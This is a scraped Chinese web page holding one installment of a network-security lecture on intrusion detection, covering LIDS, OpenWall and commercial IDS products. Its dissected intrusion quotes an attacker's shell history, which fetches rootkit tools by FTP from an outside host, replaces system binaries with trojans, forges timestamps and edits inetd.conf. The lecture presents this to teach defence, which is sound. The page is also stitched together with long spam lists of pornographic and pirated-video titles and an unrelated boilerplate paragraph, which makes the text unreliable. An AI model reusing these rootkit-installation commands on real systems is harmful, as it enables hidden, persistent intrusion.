韩剧1988免费观看全集_久久影视三级福利片_亚洲视频在线观看免费_在线观看欧美日韩_国产亚洲激情在线_亚洲精品美女久久久_欧美国产日韩一区二区在线观看_91在线观看免费高清完整版在线观看_日韩av免费看_国产又爽又黄的激情精品视频_琪琪亚洲精品午夜在线_欧美性猛xxx_不卡毛片在线看_国产亚洲日本欧美韩国_91国内在线视频_精品国产福利视频

當前位置:蘿卜系統(tǒng) > 網(wǎng)絡技術教程 > 詳細頁面

網(wǎng)絡安全講座之8:IDS系統(tǒng)(8)

網(wǎng)絡安全講座之8:IDS系統(tǒng)(8)

更新時間:2021-12-10 文章作者:未知 信息來源:網(wǎng)絡 閱讀次數(shù):

網(wǎng)絡技術是從1990年代中期發(fā)展起來的新技術,它把互聯(lián)網(wǎng)上分散的資源融為有機整體,實現(xiàn)資源的全面共享和有機協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數(shù)據(jù)資源、信息資源、知識資源、專家資源、大型數(shù)據(jù)庫、網(wǎng)絡、傳感器等。 當前的互聯(lián)網(wǎng)只限于信息共享,網(wǎng)絡則被認為是互聯(lián)網(wǎng)發(fā)展的第三階段。
  LIDS能夠保護什么?

  快速的瀏覽LIDS的文檔就可以了解LIDS的一系列特性。而我認為下面的這些特性是最重要的:

  CAP_LINUX_IMMUTABLE 當文件和外那間系統(tǒng)被標識"immutable"防止被寫; CAP_NET_ADMIN 防止篡改網(wǎng)絡配置(例如:防止路由表被修改);

  CAP_SYS_MODULE 防止內(nèi)核模塊被插入或者移除;CAP_SYS_RAWIO 防止損壞磁盤或者設備I/O;

  CAP_SYS_ADMIN 防止大范圍的使用其他系統(tǒng)功能;

  INIT_CHILDREN_LOCK which prevents child processes of the init() master process from being tampered with.

  無論在哪個點,上面這些特性都能夠通過命令"lidsadm -I"來啟動,通過"lidsadm -S"來禁用(可以允許真正的系統(tǒng)管理員來進行系統(tǒng)配置),同時提供已經(jīng)安裝在內(nèi)核中的LIDS口令(是通過RipeMD-160加密的)。

  剖析一次入侵

  當黑客把一些系統(tǒng)守護進程的緩沖區(qū)溢出以后就可以獲得root權(quán)限,這個時候就是主機被入侵了(事實上是不可能發(fā)生的,但是安裝Linux系統(tǒng)的人忘記了打上RedHat最新的關于緩沖區(qū)溢出的補丁程序,并且讓系統(tǒng)一直運行著)。當然一些黑客也不夠小心,當他們侵入主機后,很急切的獲得了shell,但是他們經(jīng)常沒有考慮到BASH的命令將會被存入系統(tǒng)日志文件中,簡單的閱讀/.bash_history就可以了解黑客到底怎么機器上面作了一些什么事情。這個文件我們可以看看(為了更加簡單我們做過一些細微的修改): mkdir /usr/lib/... ; cd /usr/lib/...ftp 200.192.58.201 21

  cd /usr/lib/...
  mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
  mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
  mv tcpd.gz? tcpd.gz
  gzip -d *
  chmod +x *
  mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
  mv pt07 /usr/lib/; mv pstree /usr/bin ;
  /usr/lib/pt07
  touch -t 199910122110 /usr/lib/pt07
  touch -t 199910122110 /usr/sbin/syslogd
  touch -t 199910122110 /usr/sbin/tcpd
  touch -t 199910122110 /bin/ps
  touch -t 199910122110 /bin/netstat
  touch -t 199910122110 /usr/bin/pstree
  cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
  mv /tmp/b /etc/inetd.conf
  killall -HUP inetd

  通讀這些內(nèi)容,我們就可以了解下面的一些動作:

  系統(tǒng)中建立了一個名字異常的目錄(/usr/lib),接著黑客telnet到了自己的主機上面(200.192.58.201,是Brazil某個地方的撥號用戶),同時下載了一套黑客工具。這些黑客工具尸沒有經(jīng)過壓縮的,中間的一些特洛伊二進制程序被安裝到了系統(tǒng)中了,這些特洛伊程序覆蓋了系統(tǒng)的netstat,ps, tcpd, syslogd和pstree命令。這些程序是用來報告系統(tǒng)有那些進程正在運行,那些端口是打開的。

  我們從中能學到什么呢?

  首先,LIDS是不能阻止一次入侵的,黑客連接上主機通過緩沖區(qū)溢出的方式獲得系統(tǒng)的root權(quán)限。一旦系統(tǒng)沒有黑客入侵,我們看看LIDS是如何使破壞降到最低的。

  LIDS通過CAP_LINUX_IMMUTABLE選項可以防止特洛尹程序被寫入到/bin,/usr/bin,/usr/sbin和/usr/lib目錄中。這些目錄我們一般都會標識為不可變的(chattr +i),因而也不會被修改。我們可以注意到,就算不使用LIDS,也可以通過chattr +I命令來標識目錄為不可變的,但是如果是通過LIDS以后,即使是root也不能篡改不可變標識位。類似的,如果文件通過chattr +I被標識為,touck -t這個命令也會失敗。甚至第一行的"mkdir /etc/lib"這個命令也會失敗,如果我們標識文件為不可讀的話。

  LIDS不能防止黑客入侵,但是可以防止入侵的黑客在侵入后進行很大的系統(tǒng)破壞。一個后門程序可以被安裝上系統(tǒng),但是沒有特洛亦版本的ps,netstat和pstree能夠很早的發(fā)現(xiàn)這個后門進程,然后kill之。如果沒有LIDS,我們不可能知道黑客通過這個后門程序會做一些什么事情,我們唯一能夠進行挽回的工作就是重裝系統(tǒng)。

  OpenWall和LIDS----額外的層

  另外一個和LIDS相似的系統(tǒng)是OpenWall工程。OpenWall工程在很多地方和LIDS不一樣,有一個OpenWall的特別的補丁就是使棧區(qū)為不可執(zhí)行。下面是摘自OpenWall的README文檔里面的申明:

  大多數(shù)緩沖區(qū)溢出攻擊都是基于覆蓋一些隨意的程序片段中的函數(shù)返回值在堆棧中的地址,如果堆棧為不可執(zhí)行,那么緩沖區(qū)溢出的弱點將會變得很難攻擊。另外一種緩沖區(qū)溢出的方式是在libc中指出一個函數(shù)的返回地址,通常是system()。這個補丁通過修改mmap()化的共享庫,使其總是一個零字節(jié)的文件。這樣使其不能再指定一些數(shù)據(jù),在很多攻擊中不得不使用ASCIIZ字符串。

  最近,在LIDS的網(wǎng)上上有一些完整的LIDS+OpenWall的內(nèi)核補丁,這樣可以提供LIDS和OpenWall都具備的特性。

  在Linux系統(tǒng)中,通過使用這一系列的多層的安全措施,可以防止很大范圍的攻擊,同時還可以防止入侵或者篡改。系統(tǒng)被黑客入侵口就是網(wǎng)絡接口,在網(wǎng)絡接口,系統(tǒng)內(nèi)核上我們都可以防止他人的入侵。意識到系統(tǒng)中的一些潛在的安全漏洞。任何運行在系統(tǒng)上的守護進程或者服務,不管是root用戶還是非root用戶運行的,都能夠成為一個潛在的安全威脅。充分準備好面對這些威脅。

  入侵監(jiān)測系統(tǒng)軟件

  突出的IDS廠商包括Axent,ISS和Platinum Technology。在你選擇產(chǎn)品時,請充分考慮哪一款產(chǎn)品更適合你的公司。有些產(chǎn)品具有優(yōu)秀的圖形界面,很容易使用。其它產(chǎn)品可能更具有擴展性。下列是部分廠商列表:

  ·Axent Intruder Alert(http://www.axent.com/)Cisco NetRanger(http://www.cisco.com/)
  ·ISS RealSecure(http://www.iss.net/)
  ·Computer Associates’ eTrust Intrusion Detection(formerly SessionWall 3)
  ·Computer Misuse Detection System(http://www.cmds.net/)
  ·Network Flight Recorder(http://www.nfr.com)
  ·Network Associates’ CyberCop Monitor(http://www.networkassociates.com)

  Intruder Alert

  Intruder Alert(ITA)是使用管理者/代理結(jié)構(gòu)的功能強大的產(chǎn)品。管理者和代理可以運行于UNIX,NT和Novell網(wǎng)絡中。ITA的第一個優(yōu)點是它可以在許多網(wǎng)絡環(huán)境中應用。由于公司很少只應用單一廠商的產(chǎn)品,所以你選擇的IDS應該可以適用于盡可能多的廠商的產(chǎn)品。

  ITA的第二個優(yōu)點是其分布式的管理結(jié)構(gòu)。ITA軟件包由兩個服務和三個應用程序組成:

  ·ITA Manager(充當服務,守護進程或Novell的可裝載的模塊)
  ·ITA Agent(充當服務,守護進程或Novell的可裝載的模塊)
  ·ITA Admin(用來配置代理的應用程序)
  ·ITA View(用于查詢代理的程序)
  ·ITA Setup(從管理者域中添加和刪除代理的程序)



網(wǎng)絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網(wǎng)絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發(fā)展,這正是網(wǎng)絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統(tǒng)下載排行

網(wǎng)站地圖xml | 網(wǎng)站地圖html
青草青青在线视频| 蜜桃导航-精品导航| 免费av福利在线观看| 三级欧美韩日大片在线看| 黄色成人av在线| 国产在线精品成人一区二区三区| 99精品在线观看| 中文字幕日韩国产| 国产chinasex对白videos麻豆| jizzjizz16| 永久免费的av网站| 精品国产乱码久久久久久闺蜜| 2017亚洲天堂1024| 在线亚洲电影| 69视频在线观看免费| 中日韩一区二区三区| 九色porny视频国产网曝| 日韩精选在线| 人体私拍套图hdxxxx| 日韩精品一区二区三区在线播放| 久久综合久久鬼色中文字| 亚洲高清在线视频| 亚洲AV成人精品| 亚洲va天堂va欧美ⅴa在线| 翔田千里在线视频| 中国女人内谢69xxxx免费视频| 朝桐光av在线一区二区三区| 成人3d动漫在线观看| 久久影视电视剧免费网站清宫辞电视| 国产精品青草综合久久久久99| 中文字幕一区二区人妻| 亚洲**毛片| 免费黄色的网站| 成人h精品动漫一区二区三区| 欧美日韩午夜剧场| 蜜臀99久久精品久久久久久软件| 欧美一级精品大片| 成人v精品蜜桃久久一区| 日韩欧美一区二区三区在线| av福利在线播放| 亚洲欧美激情诱惑| 国产真人做爰视频免费| 亚洲AV第二区国产精品| 日本tube24xxxxx| 在线播放性xxx欧美| 国产婷婷精品av在线| 在线精品视频视频中文字幕| 图片区 小说区 区 亚洲五月| 久久全国免费久久青青小草| 亚洲视频精选| 精品一区二区三孕妇视频| 国产伦精品一区二区三区在线观看| 久久精品aⅴ无码中文字字幕重口| 日本一道高清一区二区三区| 超碰免费在线观看| 亚洲天堂一区| 538国产精品一区二区在线| 一区二区三区精品视频在线观看| 91精品国产自产91精品| 国产在线日韩欧美| 日韩中文视频免费在线观看| 朝桐光av一区二区三区| 久热这里只有精品6| av免费在线观看不卡| 亚洲女同同性videoxma| 日本中文字幕在线看| 先锋av资源网| 最新黄色网址在线观看| 三妻四妾完整版在线观看电视剧| 久久人人爽爽人人爽人人片av| 国产又黄又猛的视频| 国产99对白在线播放| 久久久久久久久91| 亚洲第一成肉网| 欧美肥妇毛茸茸| swag国产精品一区二区| 四虎影视成人精品国库在线观看| a视频免费在线观看| 久久久久久五月天久久久久久久久| 免费看h的网站| 国产一区二区三区av在线| 欧美亚洲禁片免费| 国产激情精品久久久第一区二区| 欧美精品日韩三级| 色呦呦中文字幕| 美女桃色网站| 性生活在线视频| 在线视频国产区| 激情小说综合区| 萌白酱视频在线| 麻豆av免费观看| 成人高潮aa毛片免费| 国产一级在线观看| 日韩伦理福利| 亚洲wwwav| 亚洲欧美综合另类在线卡通| 亚洲国产精品成人精品| 欧美成人性生活视频| 97精品国产97久久久久久免费| 男人天堂新地址| 亚洲成人精品久久| 日本一区视频在线播放| 国产乱人乱偷精品视频| 热久久久久久久| 青青草97国产精品免费观看| 国产日韩av在线| 国产精品123| 欧美老肥婆性猛交视频| 先锋影音av资源网| 亚洲黄色www| 91免费在线看片| 涩涩视频在线| 天海翼女教师无删减版电影| 亚洲自拍欧美色图| 欧美日韩一区二区三区在线免费观看| 国产视频观看一区| 亚洲欧美日本伦理| 91精品国产91久久久久久吃药| 久久这里精品国产99丫e6| 亚洲精品偷拍视频| 一区二区三区高清不卡| www.玖玖玖| www.99热这里只有精品| 国产精品一品二区三区的使用体验| 国产亚洲欧美日韩精品一区二区三区| 亚洲国产免费| 国产模特精品视频久久久久| 亚洲日本成人在线观看| av第一福利大全导航| 国产精品av在线| 精品国产成人在线影院| 超碰在线观看91| 日本wwwwwww| 国产超碰在线观看| 午夜精品影视国产一区在线麻豆| 精品三级av在线| 写真福利片hd在线播放| 国产精品人人妻人人爽| 国产免费色视频| 91jq激情在线观看| 91九色02白丝porn| www国产亚洲精品| 欧美老熟妇乱大交xxxxx| 视频亚洲一区二区| xxxx成人| av不卡一区二区三区| 中文字幕无线码一区| 日日躁夜夜躁白天躁晚上躁91| 日韩精品高清在线| 日本xxxwww免费视频| 久久久99久久精品女同性| 色94色欧美sute亚洲线路一ni| 青青草免费在线观看| a视频在线看| 日韩高清电影免费| 精品成人av一区二区在线播放| 91在线一区二区三区| 黄www在线观看| 欧美视频在线一区| 国产精品黄色影片导航在线观看| 少妇无码一区二区三区| 极品颜值美女露脸啪啪| 亚洲欧美卡通动漫| 日本特黄久久久高潮| 视频在线国产| 日韩欧美不卡| 国内自拍第二页| 国产精品情侣呻吟对白视频| 日韩久久一区二区| 蜜桃传媒入口| 伊人久久av导航| 亚洲日产国产精品| 一区二区成人在线观看| 成人永久aaa| 18成人在线视频| www.久久久久久久久久久| 亚洲国产电影| 久久免费视频99| 电影亚洲一区| 国产精品三级在线| 美日韩一区二区| 亚洲精品一区二区在线看| 午放福利视频在线播放| 26uuu久久天堂性欧美| 成人免费看片| 毛片毛片毛片毛片毛| www.日日操| 最新av在线免费观看| 国产精品一品二品| 国产亚洲日本欧美韩国| 日韩激情视频一区二区| 女同久久另类69精品国产| 日韩激情电影免费看| 午夜精品在线视频| 手机看片福利永久国产日韩| 欧美在线播放一区| 国产欧美欧洲在线观看| 日本人添下边视频免费| 欧美精品videossex少妇| 日韩美女在线视频| 欧美日韩一区 二区 三区 久久精品| 免费不卡视频| 国产欧美日韩精品一区二区三区| 欧洲一区二区日韩在线视频观看免费| 日韩成人一级| 激情综合网五月婷婷| 香蕉成人在线视频| 亚洲激情在线观看| av免费在线网址| 性欧美大战久久久久久久| 夜夜嗨av一区二区三区中文字幕| 中文一区二区在线观看| 亚洲国产激情一区二区三区| 一本色道久久88综合日韩精品| 久久资源综合| 欧美日韩在线精品一区二区三区激情综| 亚洲妇女成熟| 色哟哟视频在线| 午夜精品福利视频网站| 菠萝蜜影院一区二区免费| 国产色产综合色产在线视频| 亚洲成人激情小说| 亚洲精品成人在线视频| 亚洲激情视频在线播放| 成人免费高清在线播放| 最好看的日本字幕mv视频大全| 五月天婷婷网站| 精品不卡在线视频| 中文字幕一区二区三区人妻电影| 国产在线导航| 狠狠色狠狠色综合日日91app| 男生草女生视频| 国产精品极品| www.国产麻豆| 老司机午夜激情| 欧美日韩视频精品一区二区| 国产精品久久| 俺去啦俺在线观看| 午夜免费在线观看精品视频| 亚洲成人黄色影院| 加勒比海盗1在线观看免费国语版| av福利导福航大全在线| 亚洲国产综合91精品麻豆| 国产精品毛片一区二区在线看舒淇| 成人高清视频在线| 亚洲天堂av女优| 成人国内精品久久久久一区| 国产一区二区三区视频播放| 一区二区国产欧美| 欧美人与牲动交xxxx| 天堂久久久久va久久久久| 成人性生交大片免费看中文视频| 国产欧美日韩专区发布| 91中文字幕精品永久在线| 日本福利在线| 91亚洲精品乱码久久久久久蜜桃| 国产精品久一| 亚洲午夜精品久久久| 亚洲视频第一页| 国产a久久麻豆| 不卡一区二区三区四区五区| 欧美日韩成人一区| 欧美日韩精品在线一区| 国产精品夜色7777狼人| 国产黄色片在线观看| 这里只有精品电影| 欧洲毛片在线| 在线视频资源站| 欧美一区三区| 免费成人深夜夜行p站| 在线观看二区| 久久精品av麻豆的观看方式| 黑人巨大精品欧美一区免费视频| 中文字幕一区二区三区最新| 国内精品国产成人国产三级粉色| 水蜜桃精品av一区二区| 精品人体无码一区二区三区| 翁止熄痒禁伦短文合集免费视频| 高清不卡一二三区| 桃花岛tv亚洲品质| 亚洲国产成人影院播放| 久久视频一区二区| 中文字幕久久综合| 最新国产在线拍揄自揄视频| 国产精品18久久久久久久网站| 成年人三级黄色片| 一本一本久久a久久精品综合麻豆| 日韩你懂的在线播放| 天天影视久久综合| 国产三线在线| 美女脱光衣服与内衣内裤一区二区三区四区| 午夜视频一区二区| 一本到不卡精品视频在线观看| 欧美淫片网站| 日韩欧美一区二区视频在线播放| 色呦呦一区二区| 在线天堂中文www视软件| 国产网站免费观看| 特黄特色免费视频| 成人综合影院| 91精品久久久久久久久99蜜臂| 麻豆精品国产传媒av| 亚洲国产欧美日韩在线| 福利网址在线| 日韩一区二区三区电影在线观看| 成人精品网站在线观看| 久草热久草热线频97精品| 日韩欧美aⅴ综合网站发布| 韩剧1988在线观看免费完整版| 在线观看av资源网| 黄污在线观看| 最近免费中文字幕大全免费第三页| 欧美 日韩 人妻 高清 中文| 午夜精品网站| 亚洲精品20p| 菠萝蜜视频国产在线播放| 欧美日韩日日夜夜| 国产精品久久久久久久久久久久久久久| 亚洲欧美日韩国产| 久久国产生活片100| 免费毛片aaaaaa| 精品一级少妇久久久久久久| 99re这里有精品| 欧美黄色一区| 啦啦啦啦免费高清视频在线观看1| 在线观看91av| 成人午夜激情在线| 69久久夜色精品国产69|